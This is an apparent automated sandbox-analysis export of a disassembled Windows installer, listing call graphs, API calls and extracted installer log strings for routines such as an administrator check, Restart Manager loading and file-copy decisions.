53831 420651 53852 420848 34 API calls 53831->53852 53832 4205e6 53832->53829 53832->53831 53840 420642 MulDiv 53832->53840 53836 420742 53834->53836 53856 420060 12 API calls 53834->53856 53838 42066a 53838->53829 53853 420060 12 API calls 53838->53853 53851 41a304 19 API calls 53840->53851 53843 420687 53844 4206a3 MulDiv 53843->53844 53845 4206c6 53843->53845 53844->53845 53845->53829 53846 4206cf MulDiv 53845->53846 53846->53829 53848 415b42 53847->53848 53857 414470 53848->53857 53850 415b5a 53850->53832 53851->53831 53852->53838 53853->53843 53854->53830 53855->53834 53856->53836 53858 41448a 53857->53858 53861 410458 53858->53861 53860 4144a0 53860->53850 53864 40dca4 53861->53864 53863 41045e 53863->53860 53865 40dd06 53864->53865 53866 40dcb7 53864->53866 53871 40dd14 53865->53871 53869 40dd14 33 API calls 53866->53869 53870 40dce1 53869->53870 53870->53863 53873 40dd24 53871->53873 53874 40dd3a 53873->53874 53883 40e09c 53873->53883 53899 40d5e0 53873->53899 53902 40df4c 53874->53902 53877 40d5e0 19 API calls 53878 40dd42 53877->53878 53878->53877 53879 40ddae 53878->53879 53905 40db60 53878->53905 53880 40df4c 19 API calls 53879->53880 53882 40dd10 53880->53882 53882->53863 53919 40e96c 53883->53919 53885 403778 18 API calls 53887 40e0d7 53885->53887 53886 40e18d 53888 40e1b7 53886->53888 53889 40e1a8 53886->53889 53887->53885 53887->53886 53982 40d774 19 API calls 53887->53982 53983 40e080 19 API calls 53887->53983 53979 40ba24 53888->53979 53928 40e3c0 53889->53928 53895 40e1b5 53896 403400 4 API calls 53895->53896 53897 40e25c 53896->53897 53897->53873 53900 40ea08 19 API calls 53899->53900 53901 40d5ea 53900->53901 53901->53873 54016 40d4bc 53902->54016 54025 40df54 53905->54025 53908 40e96c 19 API calls 53909 40db9e 53908->53909 53910 40e96c 19 API calls 53909->53910 53911 40dba9 53910->53911 53912 40dbc4 53911->53912 53913 40dbbb 53911->53913 53918 40dbc1 53911->53918 54032 40d9d8 53912->54032 54035 40dac8 33 API calls 53913->54035 53916 403420 4 API calls 53917 40dc8f 53916->53917 53917->53878 53918->53916 53985 40d780 53919->53985 53922 4034e0 18 API calls 53923 40e98f 53922->53923 53924 403744 18 API calls 53923->53924 53925 40e996 53924->53925 53926 40d780 19 API calls 53925->53926 53927 40e9a4 53926->53927 53927->53887 53929 40e3ec 53928->53929 53931 40e3f6 53928->53931 53990 40d440 19 API calls 53929->53990 53932 40e511 53931->53932 53933 40e495 53931->53933 53934 40e4f6 53931->53934 53935 40e576 53931->53935 53936 40e438 53931->53936 53937 40e4d9 53931->53937 53938 40e47a 53931->53938 53939 40e4bb 53931->53939 53950 40e45c 53931->53950 53942 40d764 19 API calls 53932->53942 53998 40de24 19 API calls 53933->53998 54003 40e890 19 API calls 53934->54003 53946 40d764 19 API calls 53935->53946 53991 40d764 53936->53991 54001 40e9a8 19 API calls 53937->54001 53997 40d818 19 API calls 53938->53997 54000 40dde4 19 API calls 53939->54000 53951 40e519 53942->53951 53945 403400 4 API calls 53952 40e5eb 53945->53952 53953 40e57e 53946->53953 53949 40e4a0 53999 40d470 19 API calls 53949->53999 53950->53945 53959 40e523 53951->53959 53960 40e51d 53951->53960 53952->53895 53961 40e582 53953->53961 53962 40e59b 53953->53962 53954 40e4e4 54002 409d38 18 API calls 53954->54002 53956 40e461 53996 40ded8 19 API calls 53956->53996 53957 40e444 53994 40de24 19 API calls 53957->53994 54004 40ea08 53959->54004 53967 40e521 53960->53967 53968 40e53c 53960->53968 53970 40ea08 19 API calls 53961->53970 54010 40de24 19 API calls 53962->54010 54008 40de24 19 API calls 53967->54008 53971 40ea08 19 API calls 53968->53971 53970->53950 53973 40e544 53971->53973 53972 40e44f 53995 40e26c 19 API calls 53972->53995 54007 40d8a0 19 API calls 53973->54007 53976 40e566 54009 40e2d4 18 API calls 53976->54009 54011 40b9d0 53979->54011 53982->53887 53983->53887 53984 40d774 19 API calls 53984->53895 53988 40d78b 53985->53988 53986 40d7c5 53986->53922 53988->53986 53989 40d7cc 19 API calls 53988->53989 53989->53988 53990->53931 53992 40ea08 19 API calls 53991->53992 53993 40d76e 53992->53993 53993->53956 53993->53957 53994->53972 53995->53950 53996->53950 53997->53950 53998->53949 53999->53950 54000->53950 54001->53954 54002->53950 54003->53950 54005 40d780 19 API calls 54004->54005 54006 40ea15 54005->54006 54006->53950 54007->53950 54008->53976 54009->53950 54010->53950 54012 40b9e2 54011->54012 54014 40ba07 54011->54014 54012->54014 54015 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54012->54015 54014->53895 54014->53984 54015->54014 54017 40ea08 19 API calls 54016->54017 54018 40d4c9 54017->54018 54019 40d4dc 54018->54019 54023 40eb0c 19 API calls 54018->54023 54019->53878 54021 40d4d7 54024 40d458 19 API calls 54021->54024 54023->54021 54024->54019 54026 40d764 19 API calls 54025->54026 54027 40df6b 54026->54027 54028 40db93 54027->54028 54029 40ea08 19 API calls 54027->54029 54028->53908 54030 40df78 54029->54030 54030->54028 54036 40ded8 19 API calls 54030->54036 54037 40ab7c 33 API calls 54032->54037 54034 40da00 54034->53918 54035->53918 54036->54028 54037->54034 56243 40ce7c 56244 40ce84 56243->56244 56245 40ceae 56244->56245 56246 40ceb2 56244->56246 56247 40cea7 56244->56247 56249 40ceb6 56246->56249 56250 40cec8 56246->56250 56256 406288 GlobalHandle GlobalUnlock GlobalFree 56247->56256 56255 40625c GlobalAlloc GlobalLock 56249->56255 56257 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 56250->56257 56253 40cec4 56253->56245 56254 408cbc 19 API calls 56253->56254 56254->56245 56255->56253 56256->56245 56257->56253 56258 41363c SetWindowLongA GetWindowLongA 56259 413699 SetPropA SetPropA 56258->56259 56260 41367b GetWindowLongA 56258->56260 56265 41f39c 56259->56265 56260->56259 56261 41368a SetWindowLongA 56260->56261 56261->56259 56270 415270 56265->56270 56277 423c0c 56265->56277 56371 423a84 56265->56371 56266 4136e9 56271 41527d 56270->56271 56272 4152e3 56271->56272 56273 4152d8 56271->56273 56276 4152e1 56271->56276 56378 424b8c 13 API calls 56272->56378 56273->56276 56379 41505c 60 API calls 56273->56379 56276->56266 56280 423c42 56277->56280 56296 423c63 56280->56296 56380 423b68 56280->56380 56281 423cec 56283 423cf3 56281->56283 56284 423d27 56281->56284 56282 423c8d 56285 423c93 56282->56285 56286 423d50 56282->56286 56291 423cf9 56283->56291 56329 423fb1 56283->56329 56287 423d32 56284->56287 56288 42409a IsIconic 56284->56288 56292 423cc5 56285->56292 56293 423c98 56285->56293 56289 423d62 56286->56289 56290 423d6b 56286->56290 56294 4240d6 56287->56294 56295 423d3b 56287->56295 56288->56296 56300 4240ae GetFocus 56288->56300 56297 423d78 56289->56297 56298 423d69 56289->56298 56387 424194 11 API calls 56290->56387 56301 423f13 SendMessageA 56291->56301 56302 423d07 56291->56302 56292->56296 56320 423cde 56292->56320 56321 423e3f 56292->56321 56303 423df6 56293->56303 56304 423c9e 56293->56304 56401 424850 WinHelpA PostMessageA 56294->56401 56306 4240ed 56295->56306 56330 423cc0 56295->56330 56296->56266 56307 4241dc 11 API calls 56297->56307 56388 423b84 NtdllDefWindowProc_A 56298->56388 56300->56296 56308 4240bf 56300->56308 56301->56296 56302->56296 56302->56330 56351 423f56 56302->56351 56392 423b84 NtdllDefWindowProc_A 56303->56392 56309 423ca7 56304->56309 56310 423e1e PostMessageA 56304->56310 56318 4240f6 56306->56318 56319 42410b 56306->56319 56307->56296 56400 41eff4 GetCurrentThreadId EnumThreadWindows 56308->56400 56315 423cb0 56309->56315 56316 423ea5 56309->56316 56393 423b84 NtdllDefWindowProc_A 56310->56393 56324 423cb9 56315->56324 56325 423dce IsIconic 56315->56325 56326 423eae 56316->56326 56327 423edf 56316->56327 56317 423e39 56317->56296 56328 4244d4 19 API calls 56318->56328 56402 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56319->56402 56320->56330 56331 423e0b 56320->56331 56384 423b84 NtdllDefWindowProc_A 56321->56384 56323 4240c6 56323->56296 56335 4240ce SetFocus 56323->56335 56324->56330 56336 423d91 56324->56336 56338 423dea 56325->56338 56339 423dde 56325->56339 56395 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56326->56395 56385 423b84 NtdllDefWindowProc_A 56327->56385 56328->56296 56329->56296 56345 423fd7 IsWindowEnabled 56329->56345 56330->56296 56386 423b84 NtdllDefWindowProc_A 56330->56386 56333 424178 26 API calls 56331->56333 56333->56296 56334 423e45 56342 423e83 56334->56342 56343 423e61 56334->56343 56335->56296 56336->56296 56389 422c4c ShowWindow PostMessageA PostQuitMessage 56336->56389 56391 423b84 NtdllDefWindowProc_A 56338->56391 56390 423bc0 29 API calls 56339->56390 56352 423a84 6 API calls 56342->56352 56394 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56343->56394 56344 423eb6 56354 423ec8 56344->56354 56361 41ef58 6 API calls 56344->56361 56345->56296 56355 423fe5 56345->56355 56348 423ee5 56349 423efd 56348->56349 56356 41eea4 2 API calls 56348->56356 56357 423a84 6 API calls 56349->56357 56351->56296 56359 423f78 IsWindowEnabled 56351->56359 56360 423e8b PostMessageA 56352->56360 56396 423b84 NtdllDefWindowProc_A 56354->56396 56364 423fec IsWindowVisible 56355->56364 56356->56349 56357->56296 56358 423e69 PostMessageA 56358->56296 56359->56296 56363 423f86 56359->56363 56360->56296 56361->56354 56397 412310 21 API calls 56363->56397 56364->56296 56366 423ffa GetFocus 56364->56366 56367 4181e0 56366->56367 56368 42400f SetFocus 56367->56368 56398 415240 56368->56398 56372 423b0d 56371->56372 56373 423a94 56371->56373 56372->56266 56373->56372 56374 423a9a EnumWindows 56373->56374 56374->56372 56375 423ab6 GetWindow GetWindowLongA 56374->56375 56403 423a1c GetWindow 56374->56403 56376 423ad5 56375->56376 56376->56372 56377 423b01 SetWindowPos 56376->56377 56377->56372 56377->56376 56378->56276 56379->56276 56381 423b72 56380->56381 56382 423b7d 56380->56382 56381->56382 56383 408720 21 API calls 56381->56383 56382->56281 56382->56282 56383->56382 56384->56334 56385->56348 56386->56296 56387->56296 56388->56296 56389->56296 56390->56296 56391->56296 56392->56296 56393->56317 56394->56358 56395->56344 56396->56296 56397->56296 56399 41525b SetFocus 56398->56399 56399->56296 56400->56323 56401->56317 56402->56317 56404 423a3d GetWindowLongA 56403->56404 56405 423a49 56403->56405 56404->56405 56406 4809f7 56407 480a00 56406->56407 56409 480a2b 56406->56409 56408 480a1d 56407->56408 56407->56409 56778 476c50 203 API calls 56408->56778 56410 480a6a 56409->56410 56780 47f4a4 18 API calls 56409->56780 56411 480a8e 56410->56411 56414 480a81 56410->56414 56415 480a83 56410->56415 56420 480aca 56411->56420 56421 480aac 56411->56421 56424 47f4e8 56 API calls 56414->56424 56782 47f57c 56 API calls 56415->56782 56416 480a22 56416->56409 56779 408be0 19 API calls 56416->56779 56417 480a5d 56781 47f50c 56 API calls 56417->56781 56785 47f33c 38 API calls 56420->56785 56425 480ac1 56421->56425 56783 47f50c 56 API calls 56421->56783 56424->56411 56784 47f33c 38 API calls 56425->56784 56428 480ac8 56429 480ada 56428->56429 56430 480ae0 56428->56430 56431 480ade 56429->56431 56435 47f4e8 56 API calls 56429->56435 56430->56431 56433 47f4e8 56 API calls 56430->56433 56532 47c66c 56431->56532 56433->56431 56435->56431 56533 42d898 GetWindowsDirectoryA 56532->56533 56534 47c690 56533->56534 56535 403450 18 API calls 56534->56535 56536 47c69d 56535->56536 56537 42d8c4 GetSystemDirectoryA 56536->56537 56538 47c6a5 56537->56538 56539 403450 18 API calls 56538->56539 56540 47c6b2 56539->56540 56541 42d8f0 6 API calls 56540->56541 56542 47c6ba 56541->56542 56543 403450 18 API calls 56542->56543 56544 47c6c7 56543->56544 56545 47c6d0 56544->56545 56546 47c6ec 56544->56546 56817 42d208 56545->56817 56548 403400 4 API calls 56546->56548 56550 47c6ea 56548->56550 56552 47c731 56550->56552 56554 42c8cc 19 API calls 56550->56554 56551 403450 18 API calls 56551->56550 56797 47c4f4 56552->56797 56556 47c70c 56554->56556 56558 403450 18 API calls 56556->56558 56557 403450 18 API calls 56559 47c74d 56557->56559 56560 47c719 56558->56560 56561 47c76b 56559->56561 56562 4035c0 18 API calls 56559->56562 56560->56552 56564 403450 18 API calls 56560->56564 56563 47c4f4 22 API calls 56561->56563 56562->56561 56565 47c77a 56563->56565 56564->56552 56566 403450 18 API calls 56565->56566 56567 47c787 56566->56567 56568 47c7af 56567->56568 56570 42c3fc 19 API calls 56567->56570 56569 47c816 56568->56569 56571 47c4f4 22 API calls 56568->56571 56573 47c8de 56569->56573 56574 47c836 SHGetKnownFolderPath 56569->56574 56572 47c79d 56570->56572 56575 47c7c7 56571->56575 56578 4035c0 18 API calls 56572->56578 56576 47c8e7 56573->56576 56577 47c908 56573->56577 56579 47c850 56574->56579 56580 47c88b SHGetKnownFolderPath 56574->56580 56581 403450 18 API calls 56575->56581 56582 42c3fc 19 API calls 56576->56582 56583 42c3fc 19 API calls 56577->56583 56578->56568 56827 403ba4 21 API calls 56579->56827 56580->56573 56778->56416 56780->56417 56781->56410 56782->56411 56783->56425 56784->56428 56785->56428 56798 42de1c RegOpenKeyExA 56797->56798 56799 47c51a 56798->56799 56800 47c540 56799->56800 56801 47c51e 56799->56801 56802 403400 4 API calls 56800->56802 56803 42dd4c 20 API calls 56801->56803 56804 47c547 56802->56804 56805 47c52a 56803->56805 56804->56557 56806 47c535 RegCloseKey 56805->56806 56807 403400 4 API calls 56805->56807 56806->56804 56807->56806 56818 4038a4 18 API calls 56817->56818 56819 42d21b 56818->56819 56820 42d232 GetEnvironmentVariableA 56819->56820 56824 42d245 56819->56824 56829 42dbd0 18 API calls 56819->56829 56820->56819 56821 42d23e 56820->56821 56823 403400 4 API calls 56821->56823 56823->56824 56824->56551 56829->56819
                                                                                            Strings
                                                                                            • Will register the file (a type library) later., xrefs: 00471513
                                                                                            • Stripped read-only attribute., xrefs: 00470EC7
                                                                                            • Dest filename: %s, xrefs: 00470894
                                                                                            • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                            • Time stamp of our file: %s, xrefs: 0047099B
                                                                                            • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                            • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                            • @, xrefs: 004707B0
                                                                                            • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                            • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                            • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                            • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                            • Same time stamp. Skipping., xrefs: 00470D55
                                                                                            • Same version. Skipping., xrefs: 00470CE5
                                                                                            • Installing into GAC, xrefs: 00471714
                                                                                            • Dest file exists., xrefs: 004709BB
                                                                                            • Installing the file., xrefs: 00470F09
                                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                            • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                            • Version of existing file: (none), xrefs: 00470CFA
                                                                                            • .tmp, xrefs: 00470FB7
                                                                                            • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                            • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                            • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                            • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                            • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                            • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                            • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                            • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                            • Version of our file: (none), xrefs: 00470AFC
                                                                                            • -- File entry --, xrefs: 004706FB
                                                                                            • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                            • InUn, xrefs: 0047115F
                                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                            • API String ID: 0-4021121268
                                                                                            • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                            • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                            • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                            • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                            • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                            • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                            • API String ID: 2252812187-1888249752
                                                                                            • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                            • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                            • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                            • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmStartSession), ref: 00450309
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmRegisterResources), ref: 0045031E
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmGetList), ref: 00450333
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmShutdown), ref: 00450348
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmRestart), ref: 0045035D
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmEndSession), ref: 00450372
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                            • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                            • API String ID: 1968650500-3419246398
                                                                                            • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                            • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                            • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                            • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1793 423c45-423c61 call 40b24c 1791->1793 1798 423cec-423cf1 1792->1798 1799 423c8d 1792->1799 1819 423c63-423c6b 1793->1819 1820 423c70-423c72 1793->1820 1800 423cf3 1798->1800 1801 423d27-423d2c 1798->1801 1802 423c93-423c96 1799->1802 1803 423d50-423d60 1799->1803 1809 423fb1-423fb9 1800->1809 1810 423cf9-423d01 1800->1810 1804 423d32-423d35 1801->1804 1805 42409a-4240a8 IsIconic 1801->1805 1811 423cc5-423cc8 1802->1811 1812 423c98 1802->1812 1807 423d62-423d67 1803->1807 1808 423d6b-423d73 call 424194 1803->1808 1813 4240d6-4240eb call 424850 1804->1813 1814 423d3b-423d3c 1804->1814 1815 424152-42415a 1805->1815 1824 4240ae-4240b9 GetFocus 1805->1824 1821 423d78-423d80 call 4241dc 1807->1821 1822 423d69-423d8c call 423b84 1807->1822 1808->1815 1809->1815 1816 423fbf-423fca call 4181e0 1809->1816 1825 423f13-423f3a SendMessageA 1810->1825 1826 423d07-423d0c 1810->1826 1817 423da9-423db0 1811->1817 1818 423cce-423ccf 1811->1818 1827 423df6-423e06 call 423b84 1812->1827 1828 423c9e-423ca1 1812->1828 1813->1815 1831 423d42-423d45 1814->1831 1832 4240ed-4240f4 1814->1832 1829 424171-424177 1815->1829 1816->1815 1878 423fd0-423fdf call 4181e0 IsWindowEnabled 1816->1878 1817->1815 1841 423db6-423dbd 1817->1841 1842 423cd5-423cd8 1818->1842 1843 423f3f-423f46 1818->1843 1819->1829 1820->1792 1820->1793 1821->1815 1822->1815 1824->1815 1836 4240bf-4240c8 call 41eff4 1824->1836 1825->1815 1844 423d12-423d13 1826->1844 1845 42404a-424055 1826->1845 1827->1815 1837 423ca7-423caa 1828->1837 1838 423e1e-423e3a PostMessageA call 423b84 1828->1838 1847 424120-424127 1831->1847 1848 423d4b 1831->1848 1858 4240f6-424109 call 4244d4 1832->1858 1859 42410b-42411e call 42452c 1832->1859 1836->1815 1891 4240ce-4240d4 SetFocus 1836->1891 1855 423cb0-423cb3 1837->1855 1856 423ea5-423eac 1837->1856 1838->1815 1841->1815 1861 423dc3-423dc9 1841->1861 1862 423cde-423ce1 1842->1862 1863 423e3f-423e5f call 423b84 1842->1863 1843->1815 1851 423f4c-423f51 call 404e54 1843->1851 1864 424072-42407d 1844->1864 1865 423d19-423d1c 1844->1865 1845->1815 1849 42405b-42406d 1845->1849 1882 42413a-424149 1847->1882 1883 424129-424138 1847->1883 1866 42414b-42414c call 423b84 1848->1866 1849->1815 1851->1815 1873 423cb9-423cba 1855->1873 1874 423dce-423ddc IsIconic 1855->1874 1875 423eae-423ec1 call 423b14 1856->1875 1876 423edf-423ef0 call 423b84 1856->1876 1858->1815 1859->1815 1861->1815 1879 423ce7 1862->1879 1880 423e0b-423e19 call 424178 1862->1880 1906 423e83-423ea0 call 423a84 PostMessageA 1863->1906 1907 423e61-423e7e call 423b14 PostMessageA 1863->1907 1864->1815 1867 424083-424095 1864->1867 1884 423d22 1865->1884 1885 423f56-423f5e 1865->1885 1903 424151 1866->1903 1867->1815 1892 423cc0 1873->1892 1893 423d91-423d99 1873->1893 1899 423dea-423df1 call 423b84 1874->1899 1900 423dde-423de5 call 423bc0 1874->1900 1922 423ed3-423eda call 423b84 1875->1922 1923 423ec3-423ecd call 41ef58 1875->1923 1916 423ef2-423ef8 call 41eea4 1876->1916 1917 423f06-423f0e call 423a84 1876->1917 1878->1815 1924 423fe5-423ff4 call 4181e0 IsWindowVisible 1878->1924 1879->1866 1880->1815 1882->1815 